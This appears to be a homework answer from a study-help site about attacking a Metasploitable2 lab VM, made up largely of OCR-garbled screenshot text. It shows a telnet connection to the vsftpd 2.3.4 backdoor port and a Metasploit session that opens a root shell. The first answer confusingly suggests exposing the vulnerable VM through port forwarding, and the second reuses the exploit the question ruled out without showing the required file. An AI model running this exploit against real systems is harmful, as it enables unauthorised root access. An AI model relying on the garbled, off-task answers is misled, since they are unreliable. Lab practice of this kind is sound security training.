Question

1. Why do we need to assign an internal IP address (i.e., behind NAT) for Metasploitable2-Linux? What will happen if we assign a public IP to it?

2. Besides the two vulnerabilities Vsftpd v2.3.4 Backdoor and Vsftpd v2.3.4 Backdoor that we used, exploit three vulnerability using msfconsole. Show me that you have placed a file in the exploited remote machine via screenshots and by creating the file with the command “touch ” where should be replaced with your full name.

Answer 1

Answer 1
************

because NAT is intermediary between two different network local and external , need to forward port number from router then you can assign public IP to it and access from world wide.

Answer 2
************

telnet [Metasploitable IP] 6200

- 2 x a kalinew [Running] - Oracle VM VirtualBox File Machine View Input Devices Help root : telnet - Konsole File Edit View Bookmarks Settings Help IVIL TATİLİLİ - DAVI TOTT 1 ---- ||TTTTTTT---- T-| |_| /_ \ |____ |- |- _ \ - V KSK V KACHCHH UNIVERSITY root@kalt:-# namp-p 6200 192.168.2.196 bash: namp: command not found root@kali:~# nmap -p 6200 192.168.2.196 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-04 14:09 EDT Nmap scan report for 192.168.2.196 Host is up (0.00048s latency). PORT STATE SERVICE 6200/tcp open lm-x MAC Address: 08:00:27:5A:08:9F (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds root@kali:~# telnet 192.168.2.196 6200 Trying 192.168.2.196... Connected to 192.168.2.196. Escape character is '^]'. [ command not found id; uid=0(root) gid=0(root) : command not found :> root: telnet – Konsole + X ) 2:10 PM = 2 Wo09 Right Ctrl D: 3.1 M 11:40 PM : 96 K ^ ¢ora (») ENG HALI 04/10/2019 1 | F

- 2 x a kalinew [Running] - Oracle VM VirtualBox File Machine View Input Devices Help root : ruby.bin - Konsole File Edit View Bookmarks Settings Help bos TV. A - IT TIVI ATTITUT- TA ILI 7 ____ IIIT___ T-L LLLLLL ! |---- |- |-1 VLT II KSK V KACHCHH UNIVERSITY root@kali:~# msfconsole [*] Starting the Metasploit Framework console... - :> root: ruby.bin — Konsole 2 + X ) 2:11 PM = 090 Right Ctrl 11:41 PM ra () ENG 04/10/2019 1 D: 2.8 M |U: 44 K o e

- 2 x a kalinew [Running] - Oracle VM VirtualBox File Machine View Input Devices Help root : ruby.bin - Konsole File Edit View Bookmarks Settings Help bos TV. A - IT TIVI ATTITUT- TA ILI 7 ____ IIIT___ T-L LLLLLL ! |---- |- |-1 VLT II KSK V KACHCHH UNIVERSITY root@kali:~# msfconsole LIVU ||___\ |-- L A |_| | |_ _ _ - 1 1 17 |___ LAVAL DEHAFFOTE -__ T ||| | |- -|| || L || ||_ LL LLL LL! =[metasploit v4.17.75-dev + -- --=[ 1912 exploits - 1066 auxiliary - 330 post + -- --=[ 545 payloads - 45 encoders - 10 nops + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use exploit/unix/ftp/vsftpd 234_backdoor msf exploit(untx/ftp/vsftpd_234_backdoor) > T :> root: ruby.bin — Konsole + X ) 2:12 PM = 090 Right Ctrl 11:42 PM ra (») ENG 04/10/20191 2 ^ D: 1.4 M |: 20K e

- 2 x a kalinew [Running] - Oracle VM VirtualBox File Machine View Input Devices Help root : ruby.bin - Konsole File Edit View Bookmarks Settings Help ban =[ metasploit v4.17.75-dev + -- --=[ 1912 exploits - 1066 auxiliary - 330 post + -- --=[ 545 payloads - 45 encoders - 10 nops -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp 1 + msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(unix/ftp/vsftpd_234_backdoor) > Show options [-] Unknown command: Show. msf exploit(untx/ftp/vsftpd_234_backdoor) > msf exploit(unix/ftp/vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): - - - - - - - - - - - - - - - Name Current Setting Required Description -------- RHOST yes The target address RPORT 21 yes The target port (TCP) Exploit target: Id Name - - 0 Automatic msf exploit(unix/ftp/vsftpd_234_backdoor) > ? : root: ruby.bin – Konsole A X ) 2:14 PM = 2 090 Right Ctrl 11:44 PM 28. ^ do Tr 1) ENG 04/10/2019 D: 2.7 M

- 2 x a kalinew [Running] - Oracle VM VirtualBox File Machine View Input Devices Help root : ruby.bin - Konsole File Edit View Bookmarks Settings Help ================ Command Description check exploit rcheck recheck reload rerun rexploit run Check to see if a target is vulnerable Launch an exploit attempt Reloads the module and checks if the target is vulnerable Alias for rcheck Just reloads the module Alias for rexploit Reloads the module and launches an exploit attempt Alias for exploit msf exploit(untx/ftp/vsftpd_234_backdoor) > show help [-] Invalid parameter "help", use "show -h" for more information mst exploit(unix/ftp/vsftpd_234_backdoor) > Show - *] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options [*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions msf exploit(unix/ftp/vsftpd 234 backdoor) > set RHOST 192.168.2.196 RHOST => 192.168.2.196 msf exploit(untx/ftp/vsftpd_234_backdoor) > run [*] 192.168.2.196:21 - Banner: 220 (vsFTPd 2.3.4) [*] 192.168.2.196:21 - USER: 331 Please specify the password. [+] 192.168.2.196:21 - Backdoor service has been spawned, handling... [+] 192.168.2.196:21 - UID: uid=0(root) gid=0(root), [*] Found shell. [*] Command shell session 1 opened (192.168.2.141:39139 -> 192.168.2.196:6200) at 2019-10-04 14:13:48 -0400 :> root : ruby.bin – Konsole ( X 2 0:32. ^ ) 2:14 PM = 090 Right Ctrl 11:44 PM 1)) ENG 04/10/2019 D: 3.3 M =

- 2 x a kalinew [Running] - Oracle VM VirtualBox File Machine View Input Devices Help root : ruby.bin - Konsole File Edit View Bookmarks Settings Help [+] 192.168.2.196:21 - Backdoor service has been spawned, handling..., [+] 192.168.2.196:21 - UID: uid=0(root) gid=0(root), [*] Found shell. [*] Command shell session 1 opened (192.168.2.141:39139 -> 192.168.2.196:6200) at 2019-10-04 14:13:48 -0400 is bin boot cdrom dev etc home initrd initrd.img lib lost+found media mnt nohup.out opt proc root sbin srv sys tmp usr var vmlinuz : root: ruby.bin – Konsole X ) 2:14 PM = WOOO00 Right Ctrl 11:44 PM la (1) ENG 04/10/2019 1 D: 4.0 M || 0:517 K o MILLEL

- 2 x a kalinew [Running] - Oracle VM VirtualBox File Machine View Input Devices Help root : ruby.bin - Konsole Bookmarks Settings Help File Edit View bin boot cdrom dev etc home initrd initrd.img lib lost+found media mnt nohup.out opt proc root sbin srv sys tmp usr var vmlinuz who Oct Oct 4 14:00 4 13:59 (:0.0) msfadmin tty1 root pts/0 whoami root : root: ruby.bin – Konsole + X 2 ) 2:15 PM = 090 Right Ctrl 11:45 PM C) ENG 04/10/2019 1 D: 2.7 M |0:50 K LIITUN °

- X Metasploitable [Running] - Oracle VM VirtualBox File Machine View Input Devices Help No mail. msfadmin@metasploitable:$ ifconfig etho Link encap:Ethernet HWaddr 08:00:27:5a:c8:9f inet addr:192.168.2.196 Bcast:192.168.2.255 Mask:255.255.255.0 ineto addr: fe80::a00:27ff:fe5a:c891/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric: 1 RX packets:154 errors:0 dropped:0 overruns:0 frame:0 TX packets:75 errors:0 dropped:0 overruns:0 carrier:0, collisions:0 txqueuelen:1000 RX bytes:17107 (16.7 KB) TX bytes:8406 (8.2 KB) Base address:0xd010 Memory:f0000000-f 0020000 lo Link encap: Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope: Host UP LOOPBACK RUNNING MTU:16436 Metric: 1 RX packets:97 errors:0 dropped:0 overruns:0 frame:0, TX packets:97 errors:0 dropped:0 overruns:0 carrier:0, collisions:0 txqueuelen:0 RX bytes:21529 (21.0 KB) TX bytes:21529 (21.0 KB) msf admin@metasploitable: $ who msf admin tty1 2019-10-04 14:00 root pts/ 0 2 019-10-04 13:59 (0.0) msf admin@metasploitable :$ Right Ctrl D: 2.6 M @ODD 1000 11:45 PM la » ENG 04/10/2019 U: 47 K F 1

if you have any doubt then please ask me without any hesitation in the comment section below , if you like my answer then please thumbs up for the answer , before giving thumbs down please discuss the question it may possible that we may understand the question different way and we can edit and change the answers if you argue, thanks :)